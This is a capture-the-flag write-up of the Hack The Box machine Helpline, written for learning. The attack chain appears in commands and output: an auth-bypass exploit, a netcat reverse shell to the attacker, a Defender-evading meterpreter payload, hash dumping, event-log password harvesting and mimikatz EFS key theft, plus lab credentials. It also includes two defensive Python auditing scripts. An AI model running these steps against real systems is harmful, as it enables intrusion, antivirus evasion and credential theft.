Summary:
Helpline is one of the harder machines on Hack The Box. Many of its stages have more than one solution, but every path ends in some unavoidable cryptography. More interestingly, the box highlights the limitations of the NT AUTHORITY\SYSTEM account: SYSTEM cannot read another user's EFS-encrypted files. The box was created by egre55, a security researcher, sysadmin, and penetration tester.
Initial Foothold
Scanning the host:
nmap -sV -sC -oA nmap/Helpline 10.10.10.132
Results:
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp  open  http-proxy
| ...
|   HTTP/1.1 200 OK
|   ...
|_http-title: ManageEngine ServiceDesk Plus
49667/tcp open  msrpc         Microsoft Windows RPC
Visiting the HTTP server on port 8080, we find ManageEngine ServiceDesk Plus version 9.3.
Researching the application turns up a privilege escalation vulnerability (CVE-2019-10008) and a Python proof of concept on Exploit-DB.
Running the script shows that the default credentials for the guest user (guest:guest) are still valid:
root@kali:~/htb/Helpline# python exploit.py
Url: http://10.10.10.132:8080
User with low priv: guest:guest
User to bypass authentication to: administrator
Getting a session id
Sessid: 253F63CAA88CB4B038ABA7F875E58F00
Logging in with low privilege user
Captured authenticated cookies.
C61BEE8F56F3BF1D596310679422DC08
B033BABB25C780CC019846A68E9F4A03
Captured secondary sessid.
23C137AAF76F84540E20B35DC9223AA3
Doing the magic step 1.
Doing the magic step 2.
Captured target session. Set following cookies on your browser.
JSESSIONID=BBA53F1EB6E71B990A4606BE77C27F8C
JSESSIONIDSSO=2974B614693EECE03EC59BD8F0EB64F0
febbc30d=da76fd72fc7d4cf988e2a4353b005060
mesdp1b50439e2e=5683542a6b38590ee79e0de77aede40061b36db8
_rem=true
After logging in as guest with the default credentials, we replace the stored cookies in the browser's developer console with the captured ones, and the session now belongs to the administrator user.
Acquiring a Shell
Command Scheduler
Under the Admin tab there is a section called Custom Schedules, which lets the help-desk application schedule and execute commands locally:
Scheduling the command below makes the server download a standalone Windows netcat binary from our machine.
powershell.exe "IWR -Uri http://10.10.14.98/nc.exe -OutFile nc.exe"
If we schedule a second command using the netcat binary, we can create a reverse shell back to us from the web server:
powershell.exe -exec bypass -c ".\nc.exe 10.10.14.98 1337 -e powershell.exe"
Both commands succeed, and we have a shell as NT AUTHORITY\SYSTEM with the working directory on the E: drive.
We can search and enumerate user directories with the Get-ChildItem cmdlet:
gci -recurse C:\Users\ | where { ! $_.PSIsContainer } | select fullname | findstr /i /v "url lnk"
FullName
--------
C:\Users\Administrator\Desktop\root.txt
C:\Users\leo\Desktop\admin-pass.xml
C:\Users\leo\Documents\run.ps1
C:\Users\tolu\Desktop\user.txt
Oddly, even as SYSTEM, and after running both takeown and icacls on user.txt, we still cannot read any of these files. Ownership and ACL changes do not help against EFS, which encrypts each file under a key that only the owning user's certificate (or a configured recovery agent) can unwrap, so let's check whether the file system is using encryption.
C:\Users\Leo\Documents>Cipher /U /N
Encrypted File(s) on your system:
C:\Users\Administrator\Desktop\root.txt
C:\Users\leo\Desktop\admin-pass.xml
C:\Users\leo\Documents\run.ps1
C:\Users\tolu\Desktop\user.txt
To access these files, we can try signing in as the users who own them. Enumerating further, there is a "C:\Temp\Password Audit\it_logins.txt" file with clear-text credentials (these turn out not to be useful for us):
PS C:\Temp\Password Audit> cat 'C:\Temp\Password Audit\it_logins.txt'
local Windows account created
username: alice
password: $sys4ops@megabank!
admin required: no
shadow admin accounts:
mike_adm:Password1
dr_acc:dr_acc
User Shell(s)
Creating a Meterpreter Session
Using GreatSCT, we can bypass Windows Defender and create a meterpreter reverse shell that is launched through MSBuild.
root@kali:/opt/GreatSCT# ./GreatSCT.py
===============================================================================
                          GreatSCT | [Version]: 1.0
===============================================================================
      [Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================

Main Menu

        1 tools loaded

Available Commands:

        exit            Exit GreatSCT
        info            Information on a specific tool
        list            List available tools
        update          Update GreatSCT
        use             Use a specific tool

Main menu choice: use 1
-----------------------------------------------------------------------------
GreatSCT-Bypass Menu

        26 payloads loaded

Available Commands:

        back            Go to main GreatSCT menu
        checkvt         Check virustotal against generated hashes
        clean           Remove generated artifacts
        exit            Exit GreatSCT
        info            Information on a specific payload
        list            List available payloads
        use             Use a specific payload

GreatSCT-Bypass command: use 9
-----------------------------------------------------------------------------
Payload: msbuild/meterpreter/rev_tcp selected

Required Options:

Name            Value    Description
----            -----    -----------
DOMAIN          X        Optional: Required internal domain
EXPIRE_PAYLOAD  X        Optional: Payloads expire after "Y" days
HOSTNAME        X        Optional: Required system hostname
INJECT_METHOD   Virtual  Virtual or Heap
LHOST                    IP of the Metasploit handler
LPORT           4444     Port of the Metasploit handler
PROCESSORS      X        Optional: Minimum number of processors
SLEEP           X        Optional: Sleep "Y" seconds, check if accelerated
TIMEZONE        X        Optional: Check to validate not in UTC
USERNAME        X        Optional: The required user account

Available Commands:

        back            Go back
        exit            Completely exit GreatSCT
        generate        Generate the payload
        options         Show the shellcode's options
        set             Set shellcode option

[msbuild/meterpreter/rev_tcp>>] set lhost 10.10.14.98
[msbuild/meterpreter/rev_tcp>>] generate

Please enter the base name for output files (default is payload): payload

[*] Language: msbuild
[*] Payload Module: msbuild/meterpreter/rev_tcp
[*] MSBuild compiles for us, so you just get xml :)
[*] Source code written to: /usr/share/greatsct-output/source/payload.xml
[*] Metasploit RC file written to: /usr/share/greatsct-output/handlers/payload.rc

Please press enter to continue >: exit
Have the remote host download payload.xml from the Kali instance, and start the handler with the generated Metasploit rc file. On Kali:
msfconsole -r payload.rc
On the Windows remote host:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe .\payload.xml
From your meterpreter session, dump hashes:
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY f684313986dcdab719c2950661809893...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:d5312b245d641b3fae0d07493a022622:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:52a344a6229f7bfa074d3052023f0b41:::
alice:1000:aad3b435b51404eeaad3b435b51404ee:998a9de69e883618e987080249d20253:::
zachary:1007:aad3b435b51404eeaad3b435b51404ee:eef285f4c800bcd1ae1e84c371eeb282:::
leo:1009:aad3b435b51404eeaad3b435b51404ee:60b05a66232e2eb067b973c889b615dd:::
niels:1010:aad3b435b51404eeaad3b435b51404ee:35a9de42e66dcdd5d512a796d03aef50:::
tolu:1011:aad3b435b51404eeaad3b435b51404ee:03e2ec7aa7e82e479be07ecd34f1603b:::
With the NT hashes in hand, we can try to crack them or look them up in public hash databases:
Hash                              Type     Result
d5312b245d641b3fae0d07493a022622  Unknown  Not found.
31d6cfe0d16ae931b73c59d7e0c089c0  NTLM
31d6cfe0d16ae931b73c59d7e0c089c0  NTLM
52a344a6229f7bfa074d3052023f0b41  Unknown  Not found.
998a9de69e883618e987080249d20253  Unknown  Not found.
eef285f4c800bcd1ae1e84c371eeb282  NTLM     0987654321
60b05a66232e2eb067b973c889b615dd  Unknown  Not found.
35a9de42e66dcdd5d512a796d03aef50  Unknown  Not found.
03e2ec7aa7e82e479be07ecd34f1603b  Unknown
Zachary's password is "0987654321", and he is a member of the Event Log Readers group.
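A defender reviewing the same dump asks different questions of it: which accounts have a blank password (31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty string, which is why the lookup returns an empty result for Guest and DefaultAccount), whether any LM hashes are still stored, and whether several accounts share one hash, i.e. one password. The script below is an added example and not part of the original writeup; the pwdump lines in it are constructed and every non-empty hash in them is made up.

```python
"""Audit pwdump-format hash lines (user:rid:lmhash:nthash:::) for weak
account hygiene: blank passwords, stored LM hashes and password reuse."""
from collections import defaultdict

# Well-known hashes of the empty password; these are public constants.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# Constructed sample dump. Every non-empty hash below is made up.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy_svc:1004:0011223344556677889900aabbccddee:fedcba9876543210fedcba9876543210:::
svc_backup:1005:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
helpdesk:1006:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
not a hash line
"""


def parse_pwdump(text):
    """Return (user, rid, lm, nt) tuples; lines that are not hash records are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not (rid.isdigit() and len(lm) == 32 and len(nt) == 32):
            continue
        rows.append((user, int(rid), lm, nt))
    return rows


def audit_hashes(rows):
    """Group the findings a reviewer would act on."""
    findings = {"blank_password": [], "lm_hash_stored": [], "shared_nt_hash": {}}
    by_nt = defaultdict(list)
    for user, _rid, lm, nt in rows:
        if nt == EMPTY_NT:
            findings["blank_password"].append(user)   # verify the account is disabled
        if lm != EMPTY_LM:
            findings["lm_hash_stored"].append(user)   # LM hashes are trivially recoverable
        by_nt[nt].append(user)
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings["shared_nt_hash"][nt] = users     # same hash means same password
    return findings


if __name__ == "__main__":
    for kind, hits in audit_hashes(parse_pwdump(SAMPLE_DUMP)).items():
        print(f"{kind}: {hits}")
```

Blank-password hits on built-in accounts are expected only while those accounts are disabled; a shared NT hash across unrelated accounts is the finding that usually matters most in an incident, because one cracked or reused password opens all of them.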
With the Administrator hash we can pass-the-hash over psexec, but only after disabling Windows Defender real-time monitoring as NT AUTHORITY\SYSTEM (from then on we no longer need MSBuild to create meterpreter sessions).
Set-MpPreference -DisableRealtimeMonitoring $true
To read the contents of Leo's user directory, we can either migrate from our current SYSTEM process into a process run by Leo, or impersonate Leo's token using incognito.
meterpreter > ps
...
 PID   PPID  Name          Arch  Session  User                        Path
 4724  5036  ctfmon.exe    x64   1        HELPLINE\leo                C:\Windows\System32\ctfmon.exe
 4804  3736  postgres.exe  x86   0        NT AUTHORITY\SYSTEM         E:\ManageEngine\ServiceDesk\pgsql\bin\postgres.exe
 4852  596   svchost.exe   x64   0        NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost.exe
 4908  904   MSBuild.exe   x86   0        NT AUTHORITY\SYSTEM         C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
 5036  596   svchost.exe   x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\svchost.exe
 5180  620   vmtoolsd.exe  x64   1        HELPLINE\leo                C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
...
meterpreter > migrate 5180
[*] Migrating from 5320 to 5180...
[*] Migration completed successfully.
meterpreter > shell
Process 3280 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type %userprofile%\Desktop\*

C:\Users\leo\Desktop\admin-pass.xml

01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f2fefa98a0d84f4b917dd8a1f5889c8100000000020000000000106600000001000020000000c2d2dd6646fb78feb6f7920ed36b0ade40efeaec6b090556fe6efb52a7e847cc000000000e8000000002000020000000c41d656142bd869ea7eeae22fc00f0f707ebd676a7f5fe04a0d0932dffac3f48300000006cbf505e52b6e132a07de261042bcdca80d0d12ce7e8e60022ff8d9bc042a437a1c49aa0c7943c58e802d1c758fc5dd340000000c4a81c4415883f937970216c5d91acbf80def08ad70a02b061ec88c9bb4ecd14301828044fefc3415f5e128cfb389cbe8968feb8785914070e8aebd6504afcaa
This is the administrator's password as an exported PSCredential (a DPAPI-protected SecureString). We will decrypt it later; first, user.txt. Using zachary's credentials, we can dump the event logs from PowerShell and search them for tolu's password.
PS C:\Windows\system32> wevtutil el > C:\EventLogs.txt
PS C:\Windows\system32> foreach ($line in Get-Content C:\EventLogs.txt) { wevtutil qe /r:10.10.10.132 /u:HELPLINE\zachary /p:0987654321 $line >> C:\ReadableLogs.txt }
Download ReadableLogs.txt to your Kali instance from meterpreter and convert it to a parse-friendly file.
meterpreter > cd C:/
meterpreter > download ReadableLogs.txt
[*] Downloading: ReadableLogs.txt -> ReadableLogs.txt
[*] Downloaded 1.00 MiB of 75.37 MiB (1.33%): ReadableLogs.txt -> ReadableLogs.txt
...
[*] download   : ReadableLogs.txt -> ReadableLogs.txt
...
root@kali:~/htb/Helpline# dos2unix ReadableLogs.txt
dos2unix: converting file ReadableLogs.txt to Unix format...
root@kali:~/htb/Helpline# grep tolu ReadableLogs.txt | grep "4688 " | grep -o "Command.*" | nl
     1  CommandLine'>"C:\Windows\system32\net.exe" use T: \\helpline\helpdesk_stats /USER:tolu !zaq1234567890pl!99</Data><Data Name='TargetUserSid'>S-1-0-0</Data><Data Name='TargetUserName'>-</Data><Data Name='TargetDomainName'>-</Data><Data Name='TargetLogonId'>0x0</Data><Data Name='ParentProcessName'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data><Data Name='MandatoryLabel'>S-1-16-12288</Data></EventData></Event>
     2  CommandLine'>"C:\Windows\system32\systeminfo.exe" /S \\helpline /U /USER:tolu /P !zaq1234567890pl!99</Data><Data Name='TargetUserSid'>S-1-0-0</Data><Data Name='TargetUserName'>-</Data><Data Name='TargetDomainName'>-</Data><Data Name='TargetLogonId'>0x0</Data><Data Name='ParentProcessName'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data><Data Name='MandatoryLabel'>S-1-16-12288</Data></EventData></Event>
User tolu has the password "!zaq1234567890pl!99".
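The search above works because both commands passed tolu's password on the command line, and process-creation auditing (event 4688 with command-line logging enabled) recorded it for anyone in Event Log Readers to see. The script below is the defender's side of the same observation, added here as an example that is not part of the original writeup: it scans exported Security-log records in the shape `wevtutil qe` produces (one `<Event>` per line, no enclosing root) for 4688 command lines that carry a credential and reports each hit with the secret masked. The log records and the `Example-Pass-*` values are constructed, the `CRED_PATTERNS` heuristics and their labels are my own, and truncated records, a `*` password placeholder (which makes net.exe prompt instead) and non-4688 events are handled as the edge cases they are.

```python
"""Scan exported Security-log XML for process-creation events (4688) whose
command line carries a credential, reporting each hit with the secret masked."""
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Heuristic patterns; each names the group holding the secret so it can be masked.
# "*" after /USER: is excluded because it makes net.exe prompt for the password.
CRED_PATTERNS = [
    ("password following /USER: (net use)",
     re.compile(r"/USER:\S+\s+(?P<secret>[^/\s*]\S*)", re.I)),
    ("/P, /P: or /PASSWORD: switch (systeminfo, wevtutil, ...)",
     re.compile(r"(?:^|\s)/P(?:ASSWORD)?[:\s]+(?P<secret>\S+)", re.I)),
    ("plaintext ConvertTo-SecureString",
     re.compile(r"ConvertTo-SecureString\s+['\"]?(?P<secret>[^'\"\s]+)['\"]?\s+-AsPlainText", re.I)),
    ("password= argument",
     re.compile(r"password\s*=\s*(?P<secret>\S+)", re.I)),
]

# Constructed records in the shape `wevtutil qe` emits (one <Event> per line,
# no enclosing root). All passwords are placeholders; the last record is
# deliberately truncated to show that garbled lines do not abort the scan.
SAMPLE_LOG = r"""
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><EventID>4688</EventID><TimeCreated SystemTime='2019-03-01T10:00:00.000Z'/></System><EventData><Data Name='SubjectUserName'>tolu</Data><Data Name='NewProcessName'>C:\Windows\System32\net.exe</Data><Data Name='CommandLine'>"C:\Windows\system32\net.exe" use T: \\fileserver\stats /USER:tolu Example-Pass-1</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><EventID>4688</EventID><TimeCreated SystemTime='2019-03-01T10:00:05.000Z'/></System><EventData><Data Name='SubjectUserName'>tolu</Data><Data Name='NewProcessName'>C:\Windows\System32\systeminfo.exe</Data><Data Name='CommandLine'>"C:\Windows\system32\systeminfo.exe" /S \\fileserver /U HELPLINE\tolu /P Example-Pass-2</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><EventID>4688</EventID><TimeCreated SystemTime='2019-03-01T10:01:00.000Z'/></System><EventData><Data Name='SubjectUserName'>tolu</Data><Data Name='NewProcessName'>C:\Windows\System32\net.exe</Data><Data Name='CommandLine'>"C:\Windows\system32\net.exe" use T: \\fileserver\stats /USER:tolu * /PERSISTENT:YES</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><EventID>4688</EventID><TimeCreated SystemTime='2019-03-01T10:02:00.000Z'/></System><EventData><Data Name='SubjectUserName'>leo</Data><Data Name='NewProcessName'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data><Data Name='CommandLine'>powershell.exe -c $p = ConvertTo-SecureString 'Example-Pass-3' -AsPlainText -Force</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><EventID>4624</EventID><TimeCreated SystemTime='2019-03-01T10:03:00.000Z'/></System><EventData><Data Name='SubjectUserName'>leo</Data><Data Name='CommandLine'>constructed non-4688 record /P Example-Pass-4</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><EventID>4688</EventID>
"""


def iter_events(xml_text):
    """Yield parsed <Event> elements; truncated or garbled records are skipped."""
    for line in xml_text.splitlines():
        line = line.strip()
        if not line.startswith("<Event"):
            continue
        try:
            yield ET.fromstring(line)
        except ET.ParseError:
            continue


def event_data(ev):
    """Flatten <EventData><Data Name=...> children into a dict."""
    return {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}


def find_exposed_credentials(xml_text):
    """Return one finding per 4688 event whose command line matches a credential pattern."""
    findings = []
    for ev in iter_events(xml_text):
        if ev.findtext("e:System/e:EventID", default="", namespaces=NS) != "4688":
            continue
        data = event_data(ev)
        cmd = data.get("CommandLine", "")
        for reason, pattern in CRED_PATTERNS:
            m = pattern.search(cmd)
            if m:
                tc = ev.find("e:System/e:TimeCreated", NS)
                findings.append({
                    "time": tc.get("SystemTime") if tc is not None else "",
                    "user": data.get("SubjectUserName", ""),
                    "process": data.get("NewProcessName", ""),
                    "reason": reason,
                    "command": cmd.replace(m.group("secret"), "<redacted>"),
                })
                break  # one finding per event is enough
    return findings


if __name__ == "__main__":
    for f in find_exposed_credentials(SAMPLE_LOG):
        print(f"{f['time']} {f['user']:<8} {f['reason']}: {f['command']}")
```

Run against a real export, the findings are the list of passwords that must be rotated; the masked command lines are what goes in the report. The same scan also catches the PowerShell pattern this writeup itself uses (`ConvertTo-SecureString '...' -AsPlainText`), which is why the third finding is attributed to leo.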
With PowerShell Remoting (CredSSP authentication), we can authenticate locally as tolu and read user.txt:
PS C:\Windows\system32> $user = 'HELPLINE\tolu'
PS C:\Windows\system32> $pass = ConvertTo-SecureString '!zaq1234567890pl!99' -AsPlainText -Force
PS C:\Windows\system32> $cred = New-Object System.Management.Automation.PSCredential($user, $pass)
PS C:\Windows\system32> Invoke-Command -ComputerName HELPLINE -Credential $cred -Authentication credssp -ScriptBlock { type C:\Users\tolu\Desktop\user.txt }
0d522**************************d3
Privilege Escalation to Administrator
Reading root.txt
Using the exported PSCredential from earlier, we can recover the plaintext password with PowerShell (this runs in the leo session obtained above, since a SecureString exported this way is DPAPI-protected with the exporting user's key), sign in as Administrator, and create a stable reverse shell with the netcat binary from earlier:
PS C:\Users\leo\Desktop> $user = 'HELPLINE\Administrator'
PS C:\Users\leo\Desktop> $file = '.\admin-pass.xml'
PS C:\Users\leo\Desktop> $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, (Get-Content $file | ConvertTo-SecureString)
PS C:\Users\leo\Desktop> $cred.GetNetworkCredential().password
mb@letmein@SERVER#acc
PS C:\Users\leo\Desktop> $securePassword = ConvertTo-SecureString -AsPlainText -Force 'mb@letmein@SERVER#acc'
PS C:\Users\leo\Desktop> $credential = New-Object System.Management.Automation.PSCredential $user, $securePassword
PS C:\Users\leo\Desktop> Enter-PSSession -ComputerName localhost -Credential $credential
[localhost]: PS C:\Users\Administrator\Documents> C:\Temp\nc.exe -e powershell.exe 10.10.14.98 1337
...
PS C:\Users\Administrator\Documents> cat ~\Desktop\root.txt
cat : Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
The file is still EFS-encrypted, and even in the Administrator session cipher reports that the key information cannot be retrieved. Return to the NT AUTHORITY\SYSTEM shell, which can read the Administrator's profile on disk, and use mimikatz together with the Administrator's password to recover the EFS private key (mimikatz should be written to a writable path).
PS C:\Users\Administrator\Desktop> Cipher /C C:\Users\Administrator\Desktop\root.txt

 Listing C:\Users\Administrator\Desktop\
 New files added to this directory will not be encrypted.

E root.txt
  Compatibility Level:
    Windows XP/Server 2003
  Users who can decrypt:
    HELPLINE\Administrator [Administrator(Administrator@HELPLINE)]
    Certificate thumbprint: FB15 4575 993A 250F E826 DBAC 79EF 26C2 11CB 77B3

  No recovery certificate found.

  Key information cannot be retrieved.

The specified file could not be decrypted.
...
...
...
C:\Temp\mimikatz\Win32>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x86) #18362 Aug 14 2019 01:31:19
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # crypto::system /file:C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\FB154575993A250FE826DBAC79EF26C211CB77B3 /export
* File: 'C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\FB154575993A250FE826DBAC79EF26C211CB77B3'
  [0019/1] SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID
    6717f9a477e4b552766871d193244f25
  [0045/1] BACKED_UP_PROP_ID
    00
  [0002/1] KEY_PROV_INFO_PROP_ID
    Provider info:
      Key Container  : 3dd3e213-bce6-4acb-808c-a1b3227ecbde
      Provider       : Microsoft Enhanced Cryptographic Provider v1.0
      Provider type  : RSA_FULL (1)
      Type           : AT_KEYEXCHANGE (0x00000001)
      Flags          : 00000000
      Param (todo)   : 00000000 / 00000000
  [0003/1] SHA1_HASH_PROP_ID
    fb154575993a250fe826dbac79ef26c211cb77b3
  [0014/1] KEY_IDENTIFIER_PROP_ID
    b2cf7205f001b70c66aab61c241e46f1b4821eb8
  [0020/1] cert_file_element
    Data: ...
    Saved to file: FB154575993A250FE826DBAC79EF26C211CB77B3.der
...
...
// Follow the path to the private key location (the directory is hidden)
C:\Temp\mimikatz\Win32>dir /a C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85
...
...

// Identify which DPAPI master key protects the private key
mimikatz # dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85"
...

// Decrypt that master key with the Administrator's password
mimikatz # dpapi::masterkey /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-3107372852-1132949149-763516304-500\9e78687d-d881-4ccb-8bd8-bc0a19608687" /password:mb@letmein@SERVER#acc
...
Auto SID from path seems to be: S-1-5-21-3107372852-1132949149-763516304-500

[masterkey] with password: mb@letmein@SERVER#acc (normal user)
  key : 8ed6519c4d09a506504c4f611203bea8979a385f8a444fe57b5d2256ee1e4eb34392a141f502cd9aeea8d2187c2525c3ae998dc3cebad81cc4e41dbb6bc65fa8
  sha1: b18974052cb509a86a008869fd95388550678184
...
...

// Decrypt the private key (the master key is now in mimikatz's cache)
mimikatz # dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85"
...
// The decrypted private key is written to raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk
...
// Download the certificate and private key to Kali to rebuild them as a PFX that will let us read root.txt
...
root@kali:~/htb/Helpline# openssl x509 -inform DER -outform PEM -in FB154575993A250FE826DBAC79EF26C211CB77B3.der -out public.pem
root@kali:~/htb/Helpline# openssl rsa -inform PVK -outform PEM -in raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk -out private.pem
writing RSA key
root@kali:~/htb/Helpline# openssl pkcs12 -in public.pem -inkey private.pem -password pass:mimikatz -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
...

// Upload and import the certificate
C:\Users\Administrator\Desktop>certutil -user -p mimikatz -importpfx cert.pfx NoChain,NoRoot
Certificate "Administrator" added to store.

CertUtil: -importPFX command completed successfully.

C:\Users\Administrator\Desktop>type root.txt
d8142**************************2c
Congratulations, you pwned a not-so easy machine!
It personally took me a week to finish a box of this magnitude and difficulty. There were a few misleading plain-text credentials in the Web API and a few other places stored locally on the box, so it was very easy to fall into a rabbit hole for a few hours or longer.
— Rayce Toms
Student Researcher